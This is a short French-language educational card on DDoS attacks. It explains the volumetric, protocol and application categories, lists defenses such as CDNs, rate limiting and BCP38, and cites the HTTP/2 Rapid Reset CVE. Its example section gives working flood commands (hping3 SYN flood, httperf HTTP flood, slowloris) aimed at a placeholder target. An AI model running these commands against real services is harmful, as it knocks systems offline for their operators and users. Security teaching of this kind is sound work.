DDoS — Déni de service distribué
★★★★★
Types d'attaques DDoS
Un DDoS (Distributed Denial of Service) vise à rendre un service indisponible en le saturant de requêtes provenant de nombreuses sources (botnet). Trois grandes catégories : volumétrique (saturer la bande passante), protocolaire (saturer les tables d'état), applicatif (saturer le CPU).
Exemples d'attaques
# Volumétrique : amplification UDP/DNS
# Attaquant envoie petite requête avec IP=victime
# Serveur répond avec une réponse énorme -> victime
# SYN Flood : saturer les connexions half-open
hping3 -S --flood -p 80 target
# HTTP Flood : saturer le serveur web
httperf --server target --rate 1000 --num-conn 10000
# Slowloris : connexions HTTP très lentes
slowloris.py target -p 80 -s 500 Défenses
CDN (Cloudflare, Akamai) absorbe le trafic · Rate limiting · Filtrage BCP38 (anti-IP spoofing) · Anycast pour distribuer la charge · Blackholing des IPs sources · CVE-2023-44487 "HTTP/2 Rapid Reset" : DDoS record en réinitialisant des flux (CVSS 7.5)